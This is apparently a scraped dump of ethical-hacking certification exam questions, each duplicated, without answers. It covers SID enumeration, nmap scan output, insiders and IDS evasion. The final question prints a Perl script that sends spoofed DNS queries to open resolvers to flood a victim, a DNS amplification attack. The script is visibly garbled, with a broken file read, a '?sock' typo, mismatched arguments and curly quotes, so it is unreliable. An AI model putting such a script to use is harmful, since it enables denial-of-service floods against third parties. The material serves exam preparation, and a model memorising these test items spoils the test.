Where should a security tester be looking for information that could be used by an attacker against an organiz
Where should a security tester be looking for information that could be used by an attacker against an organization? (Select all that apply)
Who is an Ethical Hacker?
Who is an Ethical Hacker?
What does the term "Ethical Hacking" mean?
What does the term “Ethical Hacking” mean?
What is the essential difference between an 'Ethical Hacker' and a 'Cracker'?
What is the essential difference between an ‘Ethical Hacker’ and a ‘Cracker’?
From the above list identify the user account with System Administrator privileges?
Peter extracts the SID list from Windows 2000 Server machine using the hacking tool “SIDExtracter”. Here is the output of the SIDs:
S-1-5-21-1125394485-807628933-549785860-100 John
-1-5-21-1125394485-807628933-549785860-652 Rebecca
-1-5-21-1125394485-807628933-549785860-412 Sheela
-1-5-21-1125394485-807628933-549785860-999 Shawn
-1-5-21-1125394485-807628933-549785860-777 Somia
-1-5-21-1125394485-807628933-549785860-500 Chang
-1-5-21-1125394485-807628933-549785860-555 Micah
From the above list identify the user account with System Administrator privileges?
Which of the following nmap commands in Linux produces the above output?
Starting nmap 3.75 ( http://www.insecure.org/nmap/ ) at 2006-09-25 00:01 EST Host 192.168.0.0 seems to be a subnet broadcast address (returned 4 extra pings).
Host 192.168.0.1 appears to be up.
MAC Address: 00:12:17:31:4F:C4 (Cisco-Linksys)
Host 192.168.0.6 appears to be up.
MAC Address: 00:C0:4F:A1:25:4A (Dell Computer)
Host 192.168.0.10 appears to be up.
MAC Address: 00:B0:D0:FE:87:68 (Dell Computer)
Host 192.168.0.13 appears to be up.
MAC Address: 00:C0:4F:A1:25:89 (Dell Computer)
Host 192.168.0.100 appears to be up.
MAC Address: 00:C0:4F:A1:27:BF (Dell Computer)
Host 192.168.0.103 appears to be up.
MAC Address: 00:0D:88:66:FB:87 (D-Link)
Host 192.168.0.104 appears to be up.
Host 192.168.0.108 appears to be up.
MAC Address: 00:11:D8:90:D6:7F (Asustek Computer)
Host 192.168.0.255 seems to be a subnet broadcast address (returned 4 extra pings).
Nmap run completed — 256 IP addresses (8 hosts up) scanned in 4.390 seconds
Which of the following nmap commands in Linux produces the above output?
Who is considered an insider?
A majority of attacks come from insiders, people who have direct access to a company’s computer system as part of their job function or a business relationship. Who is considered an insider?
Which of the following strategies can the employee use to evade detection by a network-based IDS application?
An employee wants to bypass detection by a network-based IDS application and does not want to attack the system containing the IDS application. Which of the following strategies can the employee use to evade detection by a network-based IDS application?
What type of attacks are these?
A Hacker would typically use a botnet to send a large number of queries to open DNS servers. These queries will be “spoofed” to look like they come from the target of the flooding, and the DNS server will reply to that network address.
It is generally possible to stop the more-common bot-delivered attack by blocking traffic from the attacking machines, which are identifiable. But blocking queries from DNS servers brings problems in its wake. A DNS server has a valid role to play in the workings of the Internet. Blocking traffic to a DNS server could also mean blocking legitimate users from sending e-mail or visiting a Web site. A single DNS query could trigger a response that is as much as 73 times larger than the request.
The following perl code can launch these attacks.
use Net::DNS::Resolver;
use Net::RawIP;
open(LIST,”ns.list”);
@list=;
close LIST;
chomp(@list);
my $lnum=@list;
my $i=0;
my $loop=0;
if ($ARGV[0] eq ”) {
print “Usage: ./hackme.pl <loop
count>n”;
exit(0);
}
while($loop < $ARGV[1]) {
while($i < $lnum) {
my $source = $ARGV[0];
my $dnspkt = new Net::DNS::Packet(“google.com”,”ANY”);
my $pktdata = $dnspkt->data;
my $sock = new Net::RawIP({udp=>{}});
?sock->set({ip => { saddr => $source, daddr => $list[$i], frag_off=>0,tos=>0,id=>1565}, udp => {source => 53, dest => 53, data=>$pktdata} });
$sock->send;
$i++;
}$loop++; $i=0;}
exit(0);
What type of attacks are these?